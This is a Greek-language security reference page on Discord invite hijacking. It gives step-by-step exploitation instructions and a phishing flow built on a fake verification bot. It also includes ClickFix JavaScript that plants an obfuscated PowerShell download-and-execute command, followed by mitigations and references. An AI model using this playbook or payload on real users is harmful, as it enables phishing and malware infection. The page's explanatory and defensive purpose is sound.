Discord Invite Hijacking

Reading time: 4 minutes

Η ευπάθεια του συστήματος προσκλήσεων του Discord επιτρέπει στους απειλητικούς παράγοντες να διεκδικήσουν κωδικούς προσκλήσεων που έχουν λήξει ή διαγραφεί (προσωρινοί, μόνιμοι ή προσαρμοσμένοι) ως νέους προσαρμοσμένους συνδέσμους σε οποιονδήποτε διακομιστή με Boost επιπέδου 3. Με την κανονικοποίηση όλων των κωδικών σε πεζά, οι επιτιθέμενοι μπορούν να προεγγραφούν σε γνωστούς κωδικούς προσκλήσεων και να υποκλέψουν σιωπηλά την κίνηση μόλις ο αρχικός σύνδεσμος λήξει ή ο πηγαίος διακομιστής χάσει το Boost του.

Τύποι Προσκλήσεων και Κίνδυνος Υποκλοπής

Βήματα Εκμετάλλευσης

1. Αναγνώριση

• Παρακολουθήστε δημόσιες πηγές (φόρουμ, κοινωνικά δίκτυα, κανάλια Telegram) για προσκλήσεις που ταιριάζουν με το μοτίβο discord.gg/{code} ή discord.com/invite/{code}.
• Συλλέξτε κωδικούς προσκλήσεων που σας ενδιαφέρουν (προσωρινούς ή προσαρμοσμένους).

2. Προεγγραφή

• Δημιουργήστε ή χρησιμοποιήστε έναν υπάρχοντα διακομιστή Discord με προνόμια Boost επιπέδου 3.
• Στις Ρυθμίσεις Διακομιστή → Προσαρμοσμένο URL, προσπαθήστε να αναθέσετε τον στοχοθετημένο κωδικό πρόσκλησης. Εάν γίνει αποδεκτός, ο κωδικός διατηρείται από τον κακόβουλο διακομιστή.

3. Ενεργοποίηση Υποκλοπής

• Για προσωρινές προσκλήσεις, περιμένετε μέχρι να λήξει η αρχική πρόσκληση (ή διαγράψτε την χειροκίνητα αν ελέγχετε την πηγή).
• Για κωδικούς που περιέχουν κεφαλαία, η πεζή παραλλαγή μπορεί να διεκδικηθεί αμέσως, αν και η ανακατεύθυνση ενεργοποιείται μόνο μετά την λήξη.

4. Σιωπηλή Ανακατεύθυνση

• Οι χρήστες που επισκέπτονται τον παλιό σύνδεσμο αποστέλλονται ομαλά στον διακομιστή που ελέγχεται από τον επιτιθέμενο μόλις η υποκλοπή είναι ενεργή.

Ροή Phishing μέσω Διακομιστή Discord

1. Περιορίστε τα κανάλια του διακομιστή ώστε να είναι ορατό μόνο το κανάλι #verify.
2. Αναπτύξτε ένα bot (π.χ., Safeguard#0786) για να προτρέπει τους νέους χρήστες να επαληθεύσουν μέσω OAuth2.
3. Το bot ανακατευθύνει τους χρήστες σε μια ιστοσελίδα phishing (π.χ., captchaguard.me) υπό την προφύλαξη ενός CAPTCHA ή βήματος επαλήθευσης.
4. Εφαρμόστε το κόλπο UX ClickFix:

• Εμφανίστε ένα μήνυμα σπασμένου CAPTCHA.
• Οδηγήστε τους χρήστες να ανοίξουν το διάλογο Win+R, να επικολλήσουν μια προφορτωμένη εντολή PowerShell και να πατήσουν Enter.

Παράδειγμα Εισαγωγής Clipboard ClickFix

// Copy malicious PowerShell command to clipboard
const cmd = `powershell -NoExit -Command "$r='NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa';` +
`$u=($r[-1..-($r.Length)]-join '');` +
`$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));` +
`iex (iwr -Uri $url)"`;
navigator.clipboard.writeText(cmd);

Αυτή η προσέγγιση αποφεύγει τις άμεσες λήψεις αρχείων και εκμεταλλεύεται οικεία στοιχεία διεπαφής χρήστη για να μειώσει την υποψία των χρηστών.

Mitigations

• Χρησιμοποιήστε μόνιμους συνδέσμους πρόσκλησης που περιέχουν τουλάχιστον ένα κεφαλαίο γράμμα ή μη αλφαριθμητικό χαρακτήρα (ποτέ δεν λήγουν, μη επαναχρησιμοποιήσιμοι).
• Περιστασιακά αλλάξτε τους κωδικούς πρόσκλησης και ανακαλέστε τους παλιούς συνδέσμους.
• Παρακολουθήστε την κατάσταση ενίσχυσης του διακομιστή Discord και τις αξιώσεις για vanity URL.
• Εκπαιδεύστε τους χρήστες να επαληθεύουν την αυθεντικότητα του διακομιστή και να αποφεύγουν την εκτέλεση εντολών που έχουν επικολληθεί από το πρόχειρο.

References

• From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery – https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/
• Discord Custom Invite Link Documentation – https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link